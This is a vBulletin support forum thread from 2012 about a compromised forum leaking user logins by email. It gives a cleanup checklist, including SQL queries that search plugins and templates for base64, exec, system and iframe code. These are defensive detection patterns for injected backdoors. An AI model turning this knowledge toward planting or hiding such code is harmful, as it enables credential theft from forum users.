leaked login info

**Wayne Luke** · Fri 8 Jun '12, 8:21pm

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru(), gzencode() or iframes. These are also often signs of a hacked site.

Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%' OR phpcode like '%gzencode%';

7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%' OR template like '%gzencode%';

It checks the templates for compromising code.

8) Check .htaccess to make sure there are no redirects there.

**beishe8** · Fri 8 Jun '12, 8:24pm

Originally posted by mavherzog

I've searched the database, the templates, and all the static files for the email address and can not find anything. I'm at a loss at to how to find this and kill it.

It might be another application which does that.

**mavherzog** · Sat 9 Jun '12, 3:28am

I've got two plugins with base64 code:

When I disable the first one, the emails stop. Should I whack both of these?? (are either of them valid?)

**Zachery** · Sat 9 Jun '12, 4:03am

There are no plugins by default in the vBulletin product.

**wave-rice** · Sat 9 Jun '12, 4:07am

vBulletin doesn't have any plugins by default so get rid of them both because they're not mean't to be there unless you or another administrator added them.

**lovecraft22** · Sat 9 Jun '12, 6:49am

How can this happen? I mean, hashes only should be stored and not plain password…

**Zachery** · Sat 9 Jun '12, 7:12am

vBulletin has an option to disable the md5 hashing before it gets sent to the server, which they might be setting.

**lovecraft22** · Sat 9 Jun '12, 8:15am

Thank you Zachery. Where can I find this option?

**Wayne Luke** · Sun 10 Jun '12, 8:38pm

Originally posted by lovecraft22

How can this happen? I mean, hashes only should be stored and not plain password…

If you modify the code, you can capture the plain password as it is typed in. Not really difficult to do. It doesn't happen when you keep your site secure though.

**HolyKiller** · Sun 10 Jun '12, 9:53pm

Check the source code of the first plugin, i think there will be some nasty code inside...

Also check admin log to see who added that plugin (Statistics & Logs -> Log Manager)
--> If you receive message like "Control Panel log viewing restricted.", you will need to add your userID in the config.php file to allow access to the logs.

vBulletin 4 End of Life

leaked login info

[Forum] leaked login info

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment